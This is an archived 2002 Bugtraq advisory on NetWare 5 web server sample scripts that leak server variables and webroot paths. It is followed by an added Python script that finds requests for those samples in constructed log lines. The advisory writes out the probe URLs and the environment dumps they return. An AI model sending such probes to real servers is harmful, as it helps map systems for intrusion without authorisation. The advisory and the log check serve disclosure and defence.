Bugtraq mailing list archives

Vulnerability in Novell Netware 5.0 (part1)


From: <webmaster () procheckup com>
Date: 29 May 2002 13:27:45 -0000



Procheckup Ltd
www.procheckup.com    

Procheckup Security Bulletin PR02-1

           
  Description: NetWare default programs display server variables, including the web root location
         Date: 8/1/2002

  Application: Netware enterprise web server
     Platform: Novell NetWare 5.0
     Severity: Remote attackers can discover the location of the webroot.
      Authors: Richard Brain [richard.brain () procheckup com]
Vendor Status:
CVE Candidate: Not assigned
    Reference: www.procheckup.com/security_info/vuln.html

  Description:
 NetWare 5.1, installed with default settings, installs the Novonyx web server. This web server listens on port 80 and comes with sample files that disclose information.


1) Requesting the following URL :-
http://webserver/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse

The following information is returned:-
Here are the ScriptEase:WSE input values
_argv[-1] = "SEWSE" 
_argv[0] = "SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/ALLFIELD.JSE"

Current directory is NETWARE/SYS:/Novonyx/suitespot/docs/sewse/misc
Here are the cgi.getVar() values
Here are the Clib.getenv() values
HTTP_ACCEPT=image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_REFERER=http://192.168.1.109/sewse/arcade.htm 
HTTP_ACCEPT_LANGUAGE=en-gb 
HTTP_ACCEPT_ENCODING=gzip, deflate 
HTTP_USER_AGENT=Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461)
HTTP_HOST=192.168.1.109 
HTTP_CONNECTION=Keep-Alive 
HTTP_COOKIE=N2S19P61=963269677 
ADMSERV_ROOT=/Novonyx/suitespot/admin-serv/config 
NETSITE_ROOT=/novonyx/suitespot 
SERVER_NAMES=lcgi 
ADMSERV_PWD=User: NS-value-is-null Password: NS-value-is-null Authorization: NS-value-is-null UserDN: NS-value-is-null
SERVER_SOFTWARE=Netscape 3.5 for NetWare 
SERVER_PORT=80 
SERVER_NAME=NETWARE.PROCHECKUP.COM 
SERVER_URL=http://192.168.1.109 
REMOTE_HOST=192.168.1.250 
REMOTE_ADDR=192.168.1.250 
HTTPS=OFF 
GATEWAY_INTERFACE=LCGI/1.1 
SERVER_PROTOCOL=HTTP/1.1 
REQUEST_METHOD=GET 
SCRIPT_NAME=/lcgi/sewse.nlm 
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse
NS_SESSION=-751448704 
NS_REQUEST=-695399320 
FN=lcgi_map_init 
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot 
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ 

==========================================================

2) ALSO

Requesting the following URL :-
http://192.168.1.109/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse

The following information is returned:-

SERVER_SOFTWARE=Netscape 3.5 for NetWare 
SERVER_PORT=80 
SERVER_NAME=NETWARE.PROCHECKUP.COM 
SERVER_URL=http://192.168.1.109 
REMOTE_HOST=192.168.1.250 
REMOTE_ADDR=192.168.1.250 
HTTPS=OFF 
GATEWAY_INTERFACE=LCGI/1.1 
SERVER_PROTOCOL=HTTP/1.1 
REQUEST_METHOD=GET 
SCRIPT_NAME=/lcgi/sewse.nlm 
QUERY_STRING=sys:/novonyx/suitespot/docs/sewse/misc/test.jse
 
NS_SESSION=-798892160 
NS_REQUEST=-800372600 
FN=lcgi_map_init 
PERL_ROOT=SYS:novonyx/suitespot/docs/perlroot 
CONFIG_DIR=/NOVONYX/SUITESPOT/https-NETWARE/config/ 
http://192.168.1.109

3) ALSO

Requesting the following URL :-
http://webserver/perl/samples/env.pl

The following information is returned:-

HSERVER_SOFTWARE Netscape 3.5 for NetWare 
GATEWAY_INTERFACE LCGI/1.1 
NS_SESSION -707141760 
REMOTE_ADDR 192.168.1.250 
SERVER_PROTOCOL HTTP/1.1 
NS_REQUEST -695399320 
PATH_INFO_TRANSLATED /novonyx/suitespot/docs/samples/env.pl 
REQUEST_METHOD GET 
REMOTE_HOST 192.168.1.250 
SERVER_URL http://192.168.1.109 
SERVER_NAMES perl 
HTTP_USER_AGENT Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; EncExt; T312461; Q312461)
HTTP_ACCEPT image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*
HTTP_CONNECTION Keep-Alive 
HTTP_ACCEPT_LANGUAGE en-gb 
HTTPS OFF 
CONFIG_DIR /NOVONYX/SUITESPOT/https-NETWARE/config/ 
FN lcgi_map_init 
SCRIPT_NAME /perl 
HTTP_ACCEPT_ENCODING gzip, deflate 
ADMSERV_ROOT /Novonyx/suitespot/admin-serv/config 
PERL_ROOT SYS:novonyx/suitespot/docs/perlroot 
SERVER_NAME NETWARE.PROCHECKUP.COM 
PATH_INFO /samples/env.pl 
HTTP_COOKIE N2S19P61=963269677 
SERVER_PORT 80 
ADMSERV_PWD User: NS-value-is-null Password: NS-value-is-null Authorization: NS-value-is-null UserDN: NS-value-is-null
HTTP_HOST 192.168.1.109 
PATH_TRANSLATED SYS:novonyx/suitespot/docs/perlroot/samples/env.pl
NETSITE_ROOT /novonyx/suitespot 

Solution:

Delete all default example programs if not needed.

Legal:

Copyright 2002 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this 
Bulletin to the Internet community for the purpose of 
alerting them to problems, if and only if, the Bulletin is 
not edited or changed in any way, is attributed to 
Procheckup, and provided such reproduction and/or 
distribution is performed for non-commercial purposes.


Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
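
To support the bulletin's solution of deleting the default sample programs, here is an added log-review example (not part of the Procheckup bulletin) that finds requests to the three sample scripts it names and reports which ones still answered 200. It assumes the web server's access log is in Common Log Format; the log lines and client address are constructed.

```python
import re
from urllib.parse import unquote

# Sample scripts named in the bulletin, lower-cased for comparison.
SAMPLE_SCRIPTS = (
    "/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse",
    "/lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/test.jse",
    "/perl/samples/env.pl",
)

# Assumed layout (Common Log Format): host ident user [time] "request" status bytes
CLF = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (\S+)[^"]*" (\d{3}) \S+')

def match_script(target):
    """Return the bulletin script a request target refers to, or None."""
    # Decode percent-escapes and fold case and slashes: the bulletin's own
    # output shows the same path in lower, upper and mixed case.
    t = unquote(target).replace("\\", "/").lower()
    t = re.sub(r"/{2,}", "/", t)
    return next((s for s in SAMPLE_SCRIPTS if t.startswith(s)), None)

def find_sample_requests(lines):
    """Return (client, time, script, status) for each sample-script request."""
    hits = []
    for line in lines:
        m = CLF.match(line)
        if not m:
            continue  # not a CLF request line
        client, when, target, status = m.groups()
        script = match_script(target)
        if script:
            hits.append((client, when, script, int(status)))
    return hits

def still_exposed(hits):
    """Scripts that answered 200, meaning the sample file is still deployed."""
    return sorted({script for _c, _w, script, status in hits if status == 200})

# Constructed sample log lines (not taken from the bulletin).
SAMPLE_LOG = [
    '192.0.2.10 - - [29/May/2002:13:20:01 +0000] "GET /lcgi/sewse.nlm?sys:/novonyx/suitespot/docs/sewse/misc/allfield.jse HTTP/1.1" 200 2140',
    '192.0.2.10 - - [29/May/2002:13:20:05 +0000] "GET /LCGI/SEWSE.NLM?SYS:/NOVONYX/SUITESPOT/DOCS/SEWSE/MISC/TEST%2EJSE HTTP/1.1" 200 1032',
    '192.0.2.10 - - [29/May/2002:13:20:09 +0000] "GET /perl/samples/env.pl HTTP/1.1" 404 210',
    '192.0.2.10 - - [29/May/2002:13:21:00 +0000] "GET /index.html HTTP/1.1" 200 512',
]

if __name__ == "__main__":
    print(still_exposed(find_sample_requests(SAMPLE_LOG)))
```

A script that appears in the `still_exposed` result has not yet been removed; a 404 for the same path after cleanup confirms the deletion took effect.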

